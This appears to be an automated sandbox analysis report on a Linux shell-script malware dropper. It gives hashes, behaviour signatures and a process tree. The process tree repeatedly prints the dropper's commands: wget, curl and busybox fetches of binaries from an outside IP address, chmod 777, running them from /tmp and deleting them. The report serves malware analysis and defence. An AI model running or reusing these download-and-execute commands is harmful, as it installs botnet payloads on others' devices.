Analysis
-
max time kernel
28s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 01:37
Static task
static1
Behavioral task
behavioral1
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
-
Size
10KB
-
MD5
c956e213cb8e0cd5b63267ab840c5dae
-
SHA1
c9c0189ae5a4b6a84cf8c69090e33e6cb8974836
-
SHA256
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d
-
SHA512
903a8b0408d84cff6c5404beab29ca6b31d19c2f9cca4fce2d34ad6a66e57f53b049639da591e42a4587431c4ed65408d48533fac69dc8d799d48e89680297bd
-
SSDEEP
192:VLdU4cGZNPeGN6Gi9oMIiOtU4cUZNXeGN6Gym:NdU4cz9oMIiMU4cPm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1644 chmod 1656 chmod 1662 chmod 1686 chmod 1554 chmod 1608 chmod 1638 chmod 1542 chmod 1530 chmod 1602 chmod 1626 chmod 1584 chmod 1680 chmod 1590 chmod 1620 chmod 1650 chmod 1524 chmod 1572 chmod 1578 chmod 1614 chmod 1632 chmod 1668 chmod 1536 chmod 1560 chmod 1566 chmod 1674 chmod 1548 chmod 1596 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t 1525 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu 1531 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe 1537 aht8qi13vR83cufA19JeM2QdZqklsVQxUe /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 1543 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs 1549 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz 1555 93SohCRyB65qsR9PHr0olpVOMBCDET7daz /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm 1561 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg 1567 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO 1573 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 1579 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA 1585 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug 1591 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 1597 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P 1603 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 1609 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA 1615 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug 1621 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 1627 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P 1633 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t 1639 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu 1645 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe 1651 aht8qi13vR83cufA19JeM2QdZqklsVQxUe /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 1657 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs 1663 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz 1669 93SohCRyB65qsR9PHr0olpVOMBCDET7daz /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm 1675 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg 1681 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO 1687 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 curl File opened for modification /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA curl File opened for modification /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug curl File opened for modification /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 curl File opened for modification /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz curl File opened for modification /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe curl File opened for modification /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz curl File opened for modification /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs curl File opened for modification /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t curl File opened for modification /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm curl File opened for modification /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 curl File opened for modification /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P curl File opened for modification /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 curl File opened for modification /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu curl File opened for modification /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg curl File opened for modification /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO curl File opened for modification /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 curl File opened for modification /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug curl File opened for modification /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P curl File opened for modification /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe curl File opened for modification /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 curl File opened for modification /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t curl File opened for modification /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg curl File opened for modification /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO curl File opened for modification /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs curl File opened for modification /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA curl File opened for modification /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu curl File opened for modification /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm curl
Processes
-
/tmp/478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh/tmp/478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh1⤵PID:1515
-
/bin/rm/bin/rm bins.sh2⤵PID:1516
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1523
-
-
/bin/chmodchmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Executes dropped EXE
PID:1525
-
-
/bin/rmrm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1526
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1527
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1529
-
-
/bin/chmodchmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Executes dropped EXE
PID:1531
-
-
/bin/rmrm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1532
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1533
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1535
-
-
/bin/chmodchmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe./aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Executes dropped EXE
PID:1537
-
-
/bin/rmrm aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1538
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1539
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Writes file to tmp directory
PID:1540
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1541
-
-
/bin/chmodchmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Executes dropped EXE
PID:1543
-
-
/bin/rmrm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1544
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1545
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1547
-
-
/bin/chmodchmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Executes dropped EXE
PID:1549
-
-
/bin/rmrm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1550
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1551
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1553
-
-
/bin/chmodchmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz./93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Executes dropped EXE
PID:1555
-
-
/bin/rmrm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1556
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1557
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1559
-
-
/bin/chmodchmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Executes dropped EXE
PID:1561
-
-
/bin/rmrm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1562
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1563
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Writes file to tmp directory
PID:1564
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1565
-
-
/bin/chmodchmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Executes dropped EXE
PID:1567
-
-
/bin/rmrm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1568
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1569
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1571
-
-
/bin/chmodchmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Executes dropped EXE
PID:1573
-
-
/bin/rmrm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1574
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1575
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1577
-
-
/bin/chmodchmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Executes dropped EXE
PID:1579
-
-
/bin/rmrm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1580
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1581
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1583
-
-
/bin/chmodchmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Executes dropped EXE
PID:1585
-
-
/bin/rmrm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1586
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1587
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Writes file to tmp directory
PID:1588
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1589
-
-
/bin/chmodchmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Executes dropped EXE
PID:1591
-
-
/bin/rmrm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1592
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1593
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1595
-
-
/bin/chmodchmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Executes dropped EXE
PID:1597
-
-
/bin/rmrm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1598
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1599
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1601
-
-
/bin/chmodchmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Executes dropped EXE
PID:1603
-
-
/bin/rmrm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1604
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1605
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1607
-
-
/bin/chmodchmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Executes dropped EXE
PID:1609
-
-
/bin/rmrm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1610
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1613
-
-
/bin/chmodchmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1616
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1619
-
-
/bin/chmodchmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1622
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1623
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1625
-
-
/bin/chmodchmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1628
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1631
-
-
/bin/chmodchmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Executes dropped EXE
PID:1633
-
-
/bin/rmrm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1634
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1635
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Writes file to tmp directory
PID:1636
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1637
-
-
/bin/chmodchmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- File and Directory Permissions Modification
PID:1638
-
-
/tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Executes dropped EXE
PID:1639
-
-
/bin/rmrm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1640
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1641
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Writes file to tmp directory
PID:1642
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1643
-
-
/bin/chmodchmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- File and Directory Permissions Modification
PID:1644
-
-
/tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Executes dropped EXE
PID:1645
-
-
/bin/rmrm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1646
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1647
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Writes file to tmp directory
PID:1648
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1649
-
-
/bin/chmodchmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe./aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Executes dropped EXE
PID:1651
-
-
/bin/rmrm aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1652
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1653
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1655
-
-
/bin/chmodchmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Executes dropped EXE
PID:1657
-
-
/bin/rmrm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1658
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1659
-
-
